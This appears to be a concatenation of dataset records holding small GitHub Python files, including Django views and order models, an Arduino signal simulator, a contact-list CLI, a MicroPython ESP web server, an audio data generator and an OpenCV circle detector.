failed'\n else:\n return 'Both failed'\n\n return get_func_pair(call_func, analyzer)\n\n else:\n raise RuntimeError('Invalid key')\n\n @classmethod\n def _calculate(cls, solver, calc_type):\n call_func, analyzer = cls._get_solver_funcs(calc_type)\n\n result_flags = call_func(solver)\n return analyzer(result_flags)\n\n\nclass DeleteTask(django.views.generic.View):\n def post(self, request, username, project_name, task_name):\n if request.is_ajax():\n user = models.User.objects.get(username=username)\n project = models.Project.objects.get(user=user, name=project_name)\n task = models.Task.objects.get(project=project, name=task_name)\n task.delete()\n\n template = 'gas_dynamics/project_content/task_container.html'\n context = {\n 'tasks': models.Task.objects.filter(project=project),\n 'project': project\n }\n return render(request, template, context)\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n\nclass GetValue(django.views.generic.View):\n\n def get(self, request, username, project_name, task_name):\n data = json.loads(request.GET['data'])\n\n return self.request_dispatcher(username, project_name, task_name, data)\n\n def request_dispatcher(self, username, project_name, task_name, data):\n if data['request_type'] == 'get_field_value':\n return self._get_field_value(username, project_name, task_name, data['request_content'])\n else:\n raise RuntimeError('Invalid request type. request_type: %(req_type)s. get_field_value required' %\n {'req_type': data['request_type']})\n\n def _get_field_value(self, username, project_name, task_name, data):\n user = models.User.objects.get(username=username)\n project = models.Project.objects.get(user=user, name=project_name)\n task = models.Task.objects.get(project=project, name=task_name)\n form_type = data['form_type']\n field_name = data['field_name']\n\n return self._get_model_value(task, form_type, field_name)\n\n def _get_model_value(self, task, form_type, field_name):\n model_class = MODEL_CLASS[form_type].value\n\n try:\n model = model_class.objects.get(task=task)\n except django.core.exceptions.ObjectDoesNotExist as e:\n return django.http.HttpResponse('')\n\n regex = re.compile('.*__[0-9]+$')\n if regex.match(field_name):\n field_name, index = field_name.split('__')\n index = int(index)\n\n value_list_str = getattr(model, field_name)\n\n if not value_list_str:\n return django.http.HttpResponse('')\n\n value_list = getattr(model, field_name)\n try:\n result_value = value_list[index]\n except IndexError:\n result_value = ''\n\n return django.http.HttpResponse(result_value)\n else:\n return django.http.HttpResponse(getattr(model, field_name))\n\n\n\n\n\n@never_cache\ndef get_plot(request):\n if request.is_ajax():\n data = {\n 'stage_number': range(4),\n 'lattice_type': ['rotor', 'stator'],\n 'render_image_url': request.build_absolute_uri(reverse('gas_dynamics:render_plot'))\n }\n return render(request, 'gas_dynamics/plot_holder.html', data)\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n\ndef render_plot(request):\n if request.is_ajax():\n if request.method == 'POST':\n form = forms.GetPlotForm(request.POST)\n\n if form.is_valid():\n cleaned_data = form.cleaned_data\n\n compressor_handler = DebugCompressorHandler()\n\n plot_path = compressor_handler.get_profile_plot(cleaned_data['stage_num'],\n cleaned_data['lattice_type'],\n cleaned_data['h_rel'],\n cleaned_data['plot_name'],\n time.time())\n return django.http.JsonResponse({'plot_path': plot_path})\n\n else:\n django.http.UnreadablePostError()\n else:\n raise django.http.BadHeaderError('POST method is required')\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n\ndef plot_page(request):\n return render(request, 'gas_dynamics/plot_page.html', {\n 'plot_uri': request.build_absolute_uri(reverse('gas_dynamics:get_plot'))\n })\n","repo_name":"Sovianum/compressors-site","sub_path":"gas_dynamics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42278855269","text":"import neurokit2 as nk\nimport numpy as np\nimport time\nimport pandas as pd\nimport serial\n\n\nclass Signal:\n ti = np.array((-70, -15, 0, 15, 100))\n ai = np.array((1.2, -5, 30, -7.5, 0.75))\n bi = np.array((0.25, 0.1, 0.1, 0.1, 0.4))\n ti = np.random.normal(ti, np.ones(5) * 3)\n ai = np.random.normal(ai, np.abs(ai / 5))\n bi = np.random.normal(bi, np.abs(bi / 5))\n\n ecg_signal = np.zeros(600)\n ecg_data = nk.ecg_simulate(duration=30)[::5]\n rsp_data= nk.rsp_simulate(duration=30,respiratory_rate=30)[::5]\n rsp_signal=np.zeros(600)\n real_time_signal=np.zeros(600)\n counter = 0\n\n\n def getSignal(type):\n Signal.generate_ecg()\n Signal.generate_rsp()\n Signal.get_realtime()\n\n if type == 1 :\n return Signal.real_time_signal\n elif type==2:\n return Signal.ecg_signal\n else:\n return Signal.rsp_signal\n \n\n def generate_ecg():\n Signal.ecg_signal = np.append(\n Signal.ecg_signal[5:], Signal.ecg_data[:5])\n Signal.ecg_data = np.append(\n Signal.ecg_data[5:], Signal.ecg_data[:5])\n\n \n def generate_rsp():\n Signal.rsp_signal = np.append(\n Signal.rsp_signal[5:], Signal.rsp_data[:5])\n Signal.rsp_data = np.append(\n Signal.rsp_data[5:], Signal.rsp_data[:5])\n\n\n def get_realtime():\n arduino = serial.Serial(port='COM3', baudrate=115200)\n reads=[]\n for i in range(5):\n while True:\n counter=0\n dataBarCode = arduino.readline()\n if len(dataBarCode) >= 1 and counter<=5:\n try:\n number= int(dataBarCode.decode(\"utf-8\"))\n reads.append(number)\n break\n except:\n continue\n arduino.close()\n \n Signal.real_time_signal = np.append(\n Signal.real_time_signal[5:], np.array(reads))\n\n","repo_name":"KamelMoohamed/Multi-signal-Monitor","sub_path":"signal_generator.py","file_name":"signal_generator.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72342127875","text":"#!/usr/bin/env python3.6\nfrom contact import Contact\n\ndef create_contact(fname,lname,phone,email):\n '''\n function to create a new contact\n '''\n\n new_contact = Contact(fname,lname,phone,email)\n return new_contact\n\ndef save_contact(contact):\n '''\n function to save contact that has been created\n '''\n\n contact.save_contact()\n\ndef del_contact(contact):\n '''\n function to delete contact that has been created\n '''\n\n contact.delete_contact()\n\ndef find_contact(number):\n '''\n function to find contact object based on phone number\n '''\n\n return Contact.find_by_number(number)\n\ndef check_existing_contacts(number):\n '''\n function that checks if a contact exists and returns a boolean value\n '''\n\n return Contact.contact_exists(number)\n\ndef display_contacts():\n '''\n function that returns all saved contacts\n '''\n\n return Contact.display_contacts()\n\ndef main():\n user_name = input(\"Hello, welcome to your contact list. What is your name? \")\n\n print(f\"Hello {user_name}. What would you like to do?\")\n print('\\n')\n\n while True:\n print(\"Use these short codes: \\n cc - create a new contact \\n dc - display contacts \\n fc - find a contact \\n ex - exit the contact list app \\n del - delete a contact \\n cpc - copy a contact email\")\n\n short_code = input().lower()\n\n if short_code == 'cc':\n print('New Contact')\n print('-' * 10)\n\n f_name = input('First name...:')\n\n l_name = input('Last name...:')\n\n p_number = input('Phone number...:')\n\n e_address = input('Email address...: ')\n\n save_contact(create_contact(f_name,l_name,p_number,e_address)) #create and save new contact\n print('\\n')\n print(f'New contact {f_name} {l_name} created')\n print('\\n')\n\n elif short_code == 'dc':\n\n if display_contacts():\n print('Here is a list of all your contacts')\n print('\\n')\n\n for contact in display_contacts():\n print(f'{contact.first_name} {contact.last_name} ......{contact.number}')\n\n print('\\n')\n else:\n print('\\n')\n print('You don\\'t seem to have any contact saved yet')\n print('\\n')\n\n elif short_code == 'fc':\n\n search_number = input('Enter the number you want to search for: ')\n\n if check_existing_contacts(search_number):\n search_contact = find_contact(search_number)\n print(f'{search_contact.first_name} {search_contact.last_name}')\n print('-' * 20)\n\n print(f'Phone number......: {search_contact.phone_number} \\n Email address......: {search_contact.email}')\n\n else:\n print('That contact does not exist')\n\n elif short_code == 'del':\n \n search_number = input('Enter the number you want to delete: ')\n\n if check_existing_contacts(search_number):\n search_contact = find_contact(search_number)\n print(f'{search_contact.first_name} {search_contact.last_name}')\n print('-' * 20)\n\n del_contact(search_contact)\n print('Your contact has been deleted')\n\n else:\n print('That contact does not exist')\n\n elif short_code == 'cpc':\n\n search_number = input('Enter the number you want to copy: ')\n\n if check_existing_contacts(search_number):\n search_contact = find_contact(search_number)\n print(f'{search_contact.first_name} {search_contact.last_name}')\n print('-' * 20)\n\n Contact.copy_email(search_number)\n print('\\n Your contact has been copied. \\n')\n\n elif short_code == 'ex':\n print('Bye..... It was fun while it lasted.... :-)')\n break\n\n else:\n print('I really didn\\'t get that. Please use the short codes')\n\nif __name__ == '__main__':\n\n main()","repo_name":"newtonkiragu/contact-list","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14297577549","text":"\"\"\"\n1160. Find Words That Can Be Formed by Characters\nhttps://leetcode.com/problems/find-words-that-can-be-formed-by-characters/\n\"\"\"\n\nclass Solution:\n def countCharacters(self, words: List[str], chars: str) -> int:\n from collections import Counter\n counts = Counter(chars)\n res = 0\n for w in words:\n w_counts = Counter(w)\n if counts & w_counts == w_counts:\n res += len(w)\n return res","repo_name":"mathvolcano/leetcode","sub_path":"1160_countCharacters.py","file_name":"1160_countCharacters.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16638157248","text":"#and \n\n#take three numbers and find out max \n\nprint(\"Enter three numbers\")\nn1 = input()\nn2 = input()\nn3 = input()\n\nn1 = int(n1)\nn2 = int(n2)\nn3 = int(n3)\n\nif n1 > n2 and n1 > n3: \n print(\"n1 is max\")\nelif n2 > n1 and n2 > n3:\n print(\"n2 is max\")\nelse:\n print(\"n3 is max\")\n ","repo_name":"tejasshah2k19/pratham-python","sub_path":"ifelsewithand.py","file_name":"ifelsewithand.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70748603714","text":"try:\n import usocket as socket\nexcept:\n import socket\n\nimport network\n\nimport esp\nesp.osdebug(None)\n\nimport gc\ngc.collect()\n\nssid = 'Mapper'\npassword = 'JokesOnYou'\n\nap = network.WLAN(network.AP_IF)\nap.active(True)\nap.ifconfig(('192.168.12.4','255.255.255.0', '192.168.12.1', '8.8.8.8'))\nap.config(essid=ssid, password=password, authmode = 3)\n\nwhile ap.active() == False:\n pass\n\nprint('Setup Successful')\nprint(ap.ifconfig())\n\ndef web_page(line):\n \n STATUS = line[0]\n \n html =\"\"\"\n \n ESP Web Server\n \n \n \n \n \n

      ESP Web Server

      \n

      \"\"\" + STATUS + \"\"\"

      \n

      \n

      \n

      \n \n\n \"\"\"\n return html\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind(('', 80))\ns.listen(5)\n\nline = [\"\"]\n\nwhile True:\n conn, addr = s.accept()\n print('Got a connection from %s' % str(addr))\n request = conn.recv(1024)\n request = str(request)\n print('Content = %s' % request)\n # =====================================================================\n forward = request.find('/?forward')\n back = request.find('/?back')\n left = request.find('/?left')\n right = request.find('/?right')\n stop = request.find('/?stop')\n\n if forward == 6:\n print (\"Forward\")\n line = [\"Forward\"]\n if back == 6:\n print (\"Reverse\")\n line = [\"Reverse\"]\n if left == 6:\n print (\"Left\")\n line = [\"Left\"]\n if right == 6:\n print (\"Right\")\n line = [\"Right\"]\n if stop == 6:\n print (\"Stop\")\n line = [\"Stop\"]\n \n # =====================================================================\n response = web_page(line)\n conn.send(response)\n conn.close()","repo_name":"hamtamSP/JAV2","sub_path":"Vincent_Adventure/Blog/Source_code/thonny file/mian.py","file_name":"mian.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12509722855","text":"def fib3(n):\n if n <= 0:\n return 0\n\n if n == 1 or n== 2:\n return 1\n\n a = 1\n b = 1\n c = 1\n d = 0\n k = n-3\n while k != 0:\n # matrix multiplication ((a, b), (c, d)) * ((e, f), (g, h)) where latter is ((1, 1), (1, 0))\n # is ((ae+bg, af+bh), (ce+dg, cf+dh)) = ((a+b,a), (c+d, c))\n (a, b, c, d) = (a+b, a, c+d, c)\n k = k - 1\n # vector multiplication ((a, b), (c, d)) * ((e), (g))) where the latter is ((1),(1)) = (a+b, c+d)\n # Fibonacci of n is the first term a+b which is returned\n return a+b\n\n# check if the number of terms is valid\nprint(fib3(30))\n","repo_name":"jvk36/UB-CSE-JV-CSE-331","sub_path":"lec_5_29_Fibonacci/fib3.py","file_name":"fib3.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9014167381","text":"from scipy.stats import beta\nimport numpy as np\n\n__all__ = ['aggregate_ranks']\n\n\ndef betascores(r):\n x = np.asarray(r, np.float)\n n = x.size\n x.sort()\n p = beta.cdf(x=x, a=np.arange(1, n + 1), b=np.arange(n, 0, -1))\n return p\n\n\ndef rhoscores(r):\n x = betascores(r)\n rho = min(x.min() * x.size, 1)\n return rho\n\n\ndef rank_matrix(glist):\n unique_elements = set()\n for l in glist:\n unique_elements.update(l)\n\n names = list(unique_elements)\n names.sort()\n ncol = len(glist)\n nrow = len(unique_elements)\n\n N = nrow\n rmat = np.ones(dtype=np.float, shape=(nrow, ncol))\n\n # This is the most obvious candidate for optimizing.\n # For loops should be rewritten to numpy array indexing operations\n for col in range(ncol):\n rows = [names.index(i) for i in glist[col]]\n for ind, row in enumerate(rows):\n rmat[row, col] = (1.0 + ind) / N\n\n return rmat, names\n\n\ndef aggregate_ranks(glist):\n \"\"\"\n Args:\n glist (list of lists):\n Returns:\n sorted list of (item, score) tuples\n lower score is better.\n \"\"\"\n rmat, names = rank_matrix(glist)\n return sorted(zip(names, (rhoscores(row) for row in rmat)), key=lambda x: x[1])\n\n","repo_name":"taagdev/texta","sub_path":"utils/robust_rank_aggregation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"73731550273","text":"\"\"\"empty message\n\nRevision ID: 977aacf533bb\nRevises: 90f79c1e9d89\nCreate Date: 2019-07-30 14:37:44.899661\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '977aacf533bb'\ndown_revision = '90f79c1e9d89'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('items', 'parcel_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('items', sa.Column('parcel_id', sa.INTEGER(), autoincrement=False, nullable=True))\n # ### end Alembic commands ###\n","repo_name":"alexarirok/Flask-Project","sub_path":"migrations/versions/977aacf533bb_.py","file_name":"977aacf533bb_.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29420746725","text":"import keras\nimport numpy as np\nimport pandas as pd\nimport librosa\n\n\nclass WaveDataGenerator(keras.utils.Sequence):\n def __init__(self, file_paths, labels=None, batch_size=32, sampling_rate=44100, audio_duration=2, mixup=False, image_aug=False):\n self.file_paths = file_paths\n self.labels = labels\n self.batch_size = batch_size\n self.sampling_rate = sampling_rate\n self.audio_duration = audio_duration\n self.samples = self.sampling_rate * self.audio_duration\n\n def __len__(self):\n return int(np.ceil(len(self.file_paths) / float(self.batch_size)))\n\n def __getitem__(self, idx):\n batch_x = self.file_paths[idx * self.batch_size:(idx + 1) * self.batch_size]\n data = np.array([self.read_audio(file_path) for file_path in batch_x])\n\n if self.labels is None:\n return data\n\n batch_y = np.array(self.labels[idx * self.batch_size:(idx + 1) * self.batch_size])\n return data, batch_y\n\n def read_audio(self, file_path):\n y, sr = librosa.load(file_path, sr=self.sampling_rate)\n # trim silence\n if 0 < len(y): # workaround: 0 length causes error\n y, _ = librosa.effects.trim(y) # trim, top_db=default(60)\n # make it unified length to conf.samples\n if len(y) > self.samples:\n # take the first n samples\n y = y[0:0 + self.samples]\n else: # pad blank\n padding = self.samples - len(y) # add padding at both ends\n offset = padding // 2\n y = np.pad(y, (offset, self.samples - len(y) - offset), 'constant')\n return y.reshape((1, self.samples))\n\n\ndef load_wave_files(file_paths):\n generator = WaveDataGenerator(file_paths)\n data = [ generator.read_audio(file_path) for file_path in file_paths]\n return np.array(data)\n\n\ndef test_generate_wave_files():\n train_curated = pd.read_csv('data/train_curated.csv')\n labels = train_curated['labels'].str.get_dummies(sep=',')\n file_paths = np.array(['data/train_curated/' + file_name for file_name in train_curated['fname']])\n generator = WaveDataGenerator(file_paths, labels)\n x, y = generator[0]\n print(x.shape)\n print(y.shape)\n\n\nif __name__ == \"__main__\":\n test_generate_mel_data_files()\n","repo_name":"Wal8800/kaggle","sub_path":"audio-tagging-2019/wave_data_generator.py","file_name":"wave_data_generator.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29709843784","text":"from decimal import Decimal\n\nfrom django.db import models\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Q\nfrom polymorphic.models import PolymorphicModel, PolymorphicManager\nfrom django.urls import reverse\nfrom django.utils import timezone\n\nfrom ..offer.models import Offer\nfrom .status_choises import Status\nfrom ..offer.price_choises import PriceType\n\n# Create your models here.\n\n\nclass OrderQuerySet(models.QuerySet):\n def search(self, **kwargs):\n qs = self\n if kwargs.get('id', ''):\n qs = qs.filter(pk=kwargs['id'])\n if kwargs.get('status', ''):\n status = kwargs['status']\n if status == Status.finished.name:\n qs = qs.filter(~Q(date_finished=None))\n if status == Status.canceled.name:\n qs = qs.filter(~Q(date_canceled=None))\n if status == Status.process.name:\n qs = qs.filter(date_finished=None, date_canceled=None)\n if kwargs.get('client_id', ''):\n qs = qs.filter(client__id=kwargs['client_id'])\n\n if kwargs.get('sort_by', ''):\n qs = qs.order_by(kwargs['sort_by'])\n\n return qs\n\n\nclass Order(models.Model):\n client = models.ForeignKey(\"user.CustomUser\", on_delete=models.PROTECT, verbose_name='Клиент')\n comment = models.TextField(verbose_name=\"комментарий к заказу\", blank=True, null=True)\n paid = models.DecimalField(max_digits=12, decimal_places=2, default=0, verbose_name='Оплачено') # сколько заплатили\n refunded = models.DecimalField(max_digits=12, decimal_places=2, default=0, verbose_name='Возвращено')\n date_create = models.DateTimeField(verbose_name=\"дата создания\", auto_now_add=True)\n date_full_prepayment = models.DateTimeField(verbose_name=\"дата полной предоплаты\", blank=True, null=True)\n date_full_paid = models.DateTimeField(verbose_name=\"дата полной оплаты\", blank=True, null=True)\n date_finished = models.DateTimeField(verbose_name=\"дата завершения\", blank=True, null=True)\n date_canceled = models.DateTimeField(verbose_name=\"дата отмены\", blank=True, null=True)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if self.pk:\n self.__original_paid, self.__original_price = self.paid, self.price\n else:\n self.__original_paid, self.__original_price = 0, 0\n\n def save(self, *args, **kwargs):\n if self.pk and (self.__original_paid != self.paid or self.__original_price != self.price):\n self.check_payment()\n super().save(*args, **kwargs)\n\n def check_payment(self):\n if self.paid >= self.prepayment:\n self.purchases.filter(is_canceled=False).update(is_prepayment_paid=True)\n if self.date_full_prepayment is None:\n self.date_full_prepayment = timezone.now()\n\n if self.paid >= self.price:\n self.purchases.filter(is_canceled=False).update(is_paid=True)\n if self.date_full_paid is None:\n self.date_full_paid = timezone.now()\n\n if self.paid < self.prepayment and self.date_full_prepayment is not None:\n self.date_full_prepayment = None\n if self.paid < self.__original_paid:\n self.purchases.filter(is_canceled=False).update(is_prepayment_paid=False)\n\n if self.paid < self.price and self.date_full_paid is not None:\n self.date_full_paid = None\n if self.paid < self.__original_paid:\n self.purchases.filter(is_canceled=False).update(is_paid=False)\n\n def mark_as_prepayment_paid(self):\n self.paid = self.prepayment\n self.save()\n\n def mark_as_fully_paid(self):\n self.paid = self.price\n self.save()\n\n def mark_as_refund_made(self):\n for purchase in self.purchases.filter(is_canceled=True, is_refund_made=False):\n purchase.is_refund_made = True\n purchase.save()\n refund_made = self.left_to_refund\n self.paid -= refund_made\n self.refunded += refund_made\n self.save()\n\n def mark_as_canceled(self):\n if self.is_cancelable():\n self.date_canceled = timezone.now()\n self.date_finished = None\n self.save()\n for purchase in self.purchases.filter(is_canceled=False, is_paid=False):\n purchase.is_canceled = True\n purchase.save()\n\n def mark_as_finished(self):\n self.date_canceled = None\n self.date_finished = timezone.now()\n if self.paid < self.price:\n self.paid = self.price\n self.save()\n for purchase in self.purchases.filter(is_canceled=False, is_paid=False):\n purchase.is_paid = True\n purchase.save()\n\n def mark_as_in_process(self):\n self.date_canceled = None\n self.date_finished = None\n self.save()\n\n def is_editable(self):\n if self.status == Status.finished.value or self.status == Status.canceled.value:\n return False\n return True\n\n def is_cancelable(self):\n if self.date_canceled is not None:\n return False\n return True\n\n @property\n def price(self):\n price = 0\n if not self.pk:\n return 0\n for purchase in self.purchases.all():\n if purchase.is_canceled and purchase.is_paid:\n price += purchase.price - purchase.refund\n elif purchase.is_canceled and not purchase.is_paid:\n price += purchase.prepayment\n elif not purchase.is_canceled:\n price += purchase.price\n\n return price\n\n @property\n def prepayment(self):\n prepayment = 0\n if not self.pk:\n return 0\n for purchase in self.purchases.filter(is_canceled=False):\n prepayment += purchase.prepayment\n return prepayment\n\n @property\n def left_to_refund(self):\n left_to_refund = self.paid - self.price\n if left_to_refund > 0:\n return left_to_refund\n return 0\n\n @property\n def left_to_pay(self):\n left_to_pay = self.price - self.paid\n if left_to_pay > 0:\n return left_to_pay\n return 0\n\n @property\n def status(self):\n if self.date_finished is not None:\n return Status.finished.value\n if self.date_canceled is not None:\n return Status.canceled.value\n return Status.process.value\n\n @property\n def payment_status(self):\n if self.date_full_paid is not None:\n return 'Полностью оплачен'\n if self.date_full_prepayment is not None:\n return 'Внесена предоплата'\n return 'Ожидает предоплату'\n\n @property\n def main_offer(self):\n if self.get_active_purchases().count() > 0:\n main_purchase = self.purchases.filter(is_canceled=False).order_by('-price').first()\n return main_purchase.offer\n main_purchase = self.purchases.order_by('-price').first()\n if main_purchase is not None:\n return main_purchase.offer\n\n @property\n def name(self):\n purchases_count = self.purchases.count()\n if purchases_count > 1:\n return f'{self.main_offer.name} и еще {purchases_count - 1} покупок'\n if self.main_offer is not None:\n return self.main_offer.name\n return f'Заказ от {self.date_create.date()}'\n\n @property\n def is_cart(self):\n if self.paid == 0 and self.refunded == 0 and self.date_canceled is None and self.date_finished is None:\n return True\n return False\n\n def get_active_purchases(self):\n return self.purchases.filter(is_canceled=False)\n\n def get_admin_edit_url(self):\n return reverse('admin_edit_order', kwargs={'order_id': self.pk})\n\n def get_admin_show_url(self):\n return reverse('admin_show_order', kwargs={'order_id': self.pk})\n\n def get_create_room_purchase_url(self):\n return reverse('create_room_purchase', kwargs={'order_id': self.pk})\n\n def get_create_service_purchase_url(self):\n return reverse('create_service_purchase', kwargs={'order_id': self.pk})\n\n def get_client_manage_url(self):\n return reverse('client_manage_order', kwargs={'order_id': self.pk})\n\n def get_client_cancel_url(self):\n return reverse('client_cancel_order', kwargs={'order_id': self.pk})\n\n def get_client_pay_url(self):\n return reverse('client_pay', kwargs={'order_id': self.pk})\n\n def get_client_history_url(self):\n return reverse('history_item', kwargs={'order_id': self.pk})\n\n class Meta:\n indexes = [\n models.Index(fields=['paid', 'refunded', 'date_create'])\n ]\n ordering = ['-date_create']\n\n objects = OrderQuerySet.as_manager()\n\n\nclass PurchaseManager(PolymorphicManager):\n def update_order_decorator(bulk_func):\n \"\"\"\n ДЕКОРАТОР ДЛЯ ОБНОВЛЕНИЯ ЗАКАЗА ПОСЛЕ ДОБАВЛЕНИЯ ЭЛЕМЕНТОВ\n \"\"\"\n from functools import wraps\n @wraps(bulk_func)\n def wrapper(*args, **kwargs):\n purchases = bulk_func(*args, **kwargs)\n if len(purchases) > 0:\n order = purchases[0].order\n order.save()\n\n return wrapper\n\n @update_order_decorator\n def bulk_create(self, purchases, **kwargs):\n for purchase in purchases:\n purchase.clean()\n purchase.price = purchase.calc_price()\n purchase.prepayment = purchase.calc_prepayment()\n purchase.refund = purchase.calc_refund()\n if not purchase.is_canceled:\n purchase.is_paid = False\n purchase.is_prepayment_paid = False\n return super(PurchaseManager, self).bulk_create(purchases, **kwargs)\n\n\nclass Purchase(PolymorphicModel):\n order = models.ForeignKey(Order, on_delete=models.CASCADE, related_name=\"purchases\")\n offer = models.ForeignKey(Offer, on_delete=models.CASCADE, related_name=\"purchases\")\n\n is_paid = models.BooleanField(default=False, verbose_name='Оплачено')\n is_prepayment_paid = models.BooleanField(default=False, verbose_name='Предоплата внесена')\n is_refund_made = models.BooleanField(default=False, verbose_name='Средства возвращены')\n is_canceled = models.BooleanField(default=False, verbose_name='Отменено')\n\n start = models.DateTimeField()\n end = models.DateTimeField()\n\n price = models.DecimalField(max_digits=12, decimal_places=2) # итоговая цена\n prepayment = models.DecimalField(max_digits=12, decimal_places=2) # итоговая предоплата\n refund = models.DecimalField(max_digits=12, decimal_places=2) # итоговый возврат средств\n\n objects = PurchaseManager()\n\n def get_status(self):\n if self.is_canceled:\n return 'Отменен'\n if self.is_paid:\n return 'Оплачен'\n if self.is_prepayment_paid:\n return 'Предоплата'\n return 'Нет'\n\n def calc_price(self):\n delta_seconds = (self.end - self.start).total_seconds()\n seconds_in_hour = 3600\n seconds_in_day = seconds_in_hour * 24\n if self.offer.price_type == PriceType.hour.name:\n hours = round(Decimal(delta_seconds / seconds_in_hour), 0)\n return self.offer.default_price * hours\n if self.offer.price_type == PriceType.day.name:\n days = round(Decimal(delta_seconds / seconds_in_day), 0)\n return self.offer.default_price * days\n\n raise ValueError('Неизвестный тип цены')\n\n def calc_prepayment(self):\n prepayment_ratio = Decimal(self.offer.prepayment_percent) / 100\n return self.price * prepayment_ratio\n\n def calc_refund(self):\n refund_ratio = Decimal(self.offer.refund_percent) / 100\n return self.price * refund_ratio\n\n def save(self, *args, **kwargs):\n self.price = self.calc_price()\n self.prepayment = self.calc_prepayment()\n self.refund = self.calc_refund()\n print('asdsd')\n super().save(*args, **kwargs)\n order = self.order\n order.save()\n\n # def clean(self):\n # from django.core.exceptions import ValidationError\n #\n # if not self.pk and self.order.date_full_prepayment:\n # raise ValidationError('Нельзя добавить покупки к уже подтвержденному заказу')\n #\n # if self.order.date_canceled or self.order.date_finished:\n # raise ValidationError('Нельзя изменить завершенный заказ')\n #\n # if self.pk and self.order.date_full_paid:\n # raise ValidationError('Нельзя изменить покупки оплаченного заказа заказ заказу')\n\n def get_info(self):\n\n return {\n 'offer': self.offer.get_info(),\n 'start': self.start.timestamp(),\n 'end': self.end.timestamp(),\n 'is_paid': self.is_paid,\n 'is_prepayment_paid': self.is_prepayment_paid,\n 'id': self.pk,\n 'edit_url': self.get_edit_url()\n }\n\n def cancel(self):\n if not self.order.purchases.exclude(pk=self.id).filter(is_canceled=False).exists() and self.order.date_canceled is None:\n self.order.mark_as_canceled()\n return\n if self.is_paid or self.is_prepayment_paid:\n self.is_canceled = True\n self.save()\n else:\n order = self.order\n self.delete()\n order.save()\n\n def is_editable(self):\n if self.is_canceled or not self.order.is_editable():\n return False\n if self.end is not None and self.end <= timezone.now():\n return False\n return True\n\n def get_info_url(self):\n return reverse('get_purchase', kwargs={'order_id': self.order.pk, 'purchase_id': self.pk})\n\n def get_cancel_url(self):\n return reverse('cancel_purchase', kwargs={'order_id': self.order.pk})\n\n def get_remove_cart_item_url(self):\n return reverse('remove_cart_item', kwargs={'purchase_id': self.pk})\n\n def get_client_edit_url(self):\n return reverse('client_manage_purchase', kwargs={'purchase_id': self.pk, 'order_id': self.order.pk})\n\n def get_client_save_changes_url(self):\n return reverse('client_save_room_changes', kwargs={'purchase_id': self.pk, 'order_id': self.order.pk})\n\n def get_client_cancel_url(self):\n return reverse('client_cancel_purchase', kwargs={'order_id': self.order.pk})\n\n def get_edit_url(self):\n return reverse('edit_room_purchase', kwargs={'order_id': self.order.pk})\n\n\nclass PurchaseCountable(Purchase):\n quantity = models.SmallIntegerField(default=1)\n\n def calc_price(self):\n return super().calc_price() * self.quantity\n\n def get_info(self):\n data = super().get_info()\n data['quantity'] = self.quantity\n return data\n\n def get_edit_url(self):\n return reverse('edit_service_purchase', kwargs={'order_id': self.order.pk})\n\n def get_client_save_changes_url(self):\n return reverse('client_save_service_changes', kwargs={'purchase_id': self.pk, 'order_id': self.order.pk})\n\n\n","repo_name":"SergeiGD/Crystal-Lake-backend","sub_path":"crystallake/apps/order/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4063671675","text":"import cv2\nimport numpy as np\n\nvideoCapture = cv2.VideoCapture(0)\nprevCircle = None\ndef dist(x1, y1, x2, y2): return (x1-x2)**2*(y1-y2)**2\n\n\nwhile True:\n ret, frame = videoCapture.read()\n if not ret:\n break\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (17, 17), 0)\n\n circles = cv2.HoughCircles(blur, cv2.HOUGH_GRADIENT, 1.2,\n 100, param1=100, param2=75, minRadius=75, maxRadius=500)\n\n if circles is not None:\n circles = np.uint16(np.around(circles))\n chosen = None\n for i in circles[0, :]:\n if chosen is None:\n chosen = i\n if prevCircle is not None:\n if (dist(chosen[0], chosen[1], prevCircle[0], prevCircle[1]) <= dist(i[0], i[1], prevCircle[0], prevCircle[1])):\n chosen = i\n cv2.circle(frame, (chosen[0], chosen[1]), 1, (0, 100, 100), 3)\n cv2.circle(frame, (chosen[0], chosen[1]), chosen[2], (255, 0, 255), 3)\n prevCircle = chosen\n\n flip_img = cv2.flip(frame, 1)\n 